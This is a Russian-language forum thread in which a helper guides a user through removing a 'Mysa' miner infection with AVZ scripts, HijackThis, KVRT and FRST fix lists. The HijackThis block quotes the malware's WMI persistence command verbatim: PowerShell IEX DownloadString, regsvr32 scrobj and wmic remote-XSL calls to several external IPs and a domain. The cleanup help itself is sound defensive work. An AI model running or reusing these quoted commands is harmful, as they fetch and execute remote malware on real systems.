Решена Mysa 1,2,3 + ok

Статус
В этой теме нельзя размещать новые ответы.

arsuspo

Новый пользователь
Сообщения
5
Реакции
0
Здравствуйте, здесь, на форуме увидел темы, которые соотносятся с моей проблемой, и поэтому скидываю логи.
 

Вложения

  • CollectionLog-2019.11.03-23.21.zip
    43.1 KB · Просмотры: 1
  • report1.log
    880 байт · Просмотры: 1
  • report2.log
    2.8 KB · Просмотры: 1
Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ из папки Autologger (Файл - Выполнить скрипт):
Код:
  begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
  SearchRootkit(true, true);
  SetAVZGuardStatus(True);
  end;
 QuarantineFile('c:\windows\inf\aspnet\lsma.exe','');
 DeleteFile('c:\windows\inf\aspnet\lsma.exe','64');
 DeleteSchedulerTask('oka');
   BC_Activate;
  ExecuteSysClean;
  ExecuteWizard('SCU', 2, 3, true);
 BC_ImportALL;
RebootWindows(true);
end.
Компьютер перезагрузится.

После перезагрузки, выполните такой скрипт:

Код:
begin
DeleteFile(GetAVZDirectory+'quarantine.7z');
ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine .\Quarantine\*', 1, 300000, false);
end.

Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: malware в теле письма.

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):
Код:
O25 - WMI Event: fuckamm4 - fuckamm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://80.85.158.117:8117/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.162:8162/power.txt')||regsvr32 /u /s /i:http://80.85.158.117:8117/s.txt scrobj.dll&regsvr32 /u /s /i:http://103.106.250.161:8161/s.txt scrobj.dll&regsvr32 /u /s /i:http://172.83.155.170:8170/s.txt scrobj.dll&regsvr32 /u /s /i:http://192.236.160.237:8237/s.txt scrobj.dll&regsvr32 /u /s /i:http://103.106.250.162:8162/s.txt scrobj.dll&regsvr32 /u /s /i:http://wmi.1103bye.xyz:8080/s.txt scrobj.dll&wmic os get /FORMAT:"http://172.83.155.170:8170/s.xsl"

1. Скачайте утилиту на рабочий стол.
2. Запустите KVRT и подтвердите согласие с условиями использования
3. Дождитесь завершения инициализации и в открывшемся окне нажмите на кнопку "Изменить параметры"
4. В открывшемся меню, поставьте галочку напротив "Системный раздел" и нажмите "Ок"
5. Нажмите кнопку "Начать проверку" для начала сканирования и пролечите все найденое.
6. Дождитесь завершения сканирования и зайдите в папку C:\KVRT_Data\ (C:\ это обычно раздел, где установлена работающая версия Windows) и упакуйте папку Reports в архив и прикрепите к теме
 
Скрипты выполнил, в форму отправил, пофиксил и вот с Reports.
 

Вложения

  • report_20191103_235101.klr.rar
    2.1 KB · Просмотры: 1
Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 
Просканировал.
 

Вложения

  • Addition.txt
    31.4 KB · Просмотры: 1
  • FRST.txt
    49 KB · Просмотры: 1
  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Код:
    Start::
    CreateRestorePoint:
    VirusTotal: C:\Windows\system32\n1.dat;C:\Windows\system32\n.dat;
    HKLM\...\Run: [] => [X]
    HKLM-x32\...\Run: [] => [X]
    HKU\S-1-5-21-2843635995-2632599509-2577391226-1000\...\Run: [] => [X]
    Task: {A847B2E6-1017-45F7-9E6A-E6D6E7010A41} - \Mysa2 -> No File <==== ATTENTION
    Task: {BF753883-F886-4E0A-AD0D-7D03B675FEFC} - \Mysa -> No File <==== ATTENTION
    Task: {D5006E2D-B874-42BC-95A4-E7C1DEB29859} - \Mysa3 -> No File <==== ATTENTION
    FF ProfilePath: C:\Users\Юservice\AppData\Roaming\Mozilla\Firefox\Profiles\vyu7k7yd.default-1426025487454 [not found] <==== ATTENTION
    FF ProfilePath: C:\ProgramData\Kaspersky Lab\SafeBrowser\S-1-5-21-3591597119-369042605-4045123810-1000\FireFox [not found] <==== ATTENTION
    FF ProfilePath: C:\Users\Юservice\AppData\Roaming\Mozilla\Firefox\Profiles\zambwcgc.default-release [not found] <==== ATTENTION
    2019-10-16 16:01 - 2019-11-03 18:01 - 000000081 _____ C:\Windows\system32\s
    2019-10-16 16:01 - 2019-11-03 18:01 - 000000079 _____ C:\Windows\system32\ps
    2019-10-16 16:01 - 2019-11-03 18:01 - 000000077 _____ C:\Windows\system32\p
    FirewallRules: [{4E964037-929A-4A07-A560-01ADED0F2CFC}] => (Allow) C:\Users\Юservice\AppData\Local\Temp\7ZipSfx.000\bin\tools\aria2c.exe No File
    FirewallRules: [{2B681B90-8DAE-43BB-9C75-89A5AAE016DA}] => (Allow) C:\Program Files (x86)\DriverPack Cloud\cloud.exe No File
    EmptyTemp:
    Reboot:
    End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.
 
Всё сделано.
 

Вложения

  • Fixlog.txt
    5 KB · Просмотры: 1
Смотрится неплохо, что с проблемой?
 
Пока ничего не могу сказать - в автозагрузках не вижу, файлов, которые они порождают пока тоже. Если вдруг начнётся, то снова скидывать логи?
 
Да, понаблюдайте пару дней, если все хорошо закрою тему.

Ну и анализ защищенности проведем. Подготовьте лог SecurityCheck by glax24
 
Здравствуйте!

Ввиду отсутствия активности в течение последних 10 дней, предположу, что помощь больше не нужна. Поэтому тема закрывается.
Если Вам по-прежнему нужна помощь, отправьте личное сообщение одному из модераторов и укажите ссылку на эту тему.

Спасибо за использование нашего форума и удачи!
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху Снизу